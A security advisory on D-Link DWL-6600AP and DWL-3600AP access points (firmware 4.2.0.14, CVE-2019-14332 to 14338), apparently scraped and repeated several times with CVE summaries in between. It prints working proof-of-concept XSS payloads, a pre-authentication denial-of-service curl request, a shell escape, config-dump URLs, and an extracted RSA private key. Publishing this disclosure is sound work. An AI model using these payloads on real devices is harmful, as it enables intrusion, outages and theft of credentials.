BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP , DWL-3600AP , DWL-8610AP Devices have a certificate validation vulnerability.Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated dump of all of the config files through a certain admin.cgi?action= insecure HTTP request. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Information may be obtained. D-Link DWL-6600AP is a dual-band unified management wireless access point device designed for enterprise environments. D-Link DWL-3600AP is a single-frequency unified management wireless access point device designed for enterprise environments. D-Link DWL-6600AP and DWL-3600AP 4.2.0.14 have configuration file dump vulnerability. A security vulnerability exists in D-Link 6600-AP and DWL-3600AP version 4.2.0.14. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Post-authenticated Certificate and RSA Private Key extraction through http command #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14334 #### Proof-of concept http://10.90.90.91/sslcert-get.cgi? Result of the command: File "mini_httpd.pem" automatically extracted -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE----- ### 3. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### 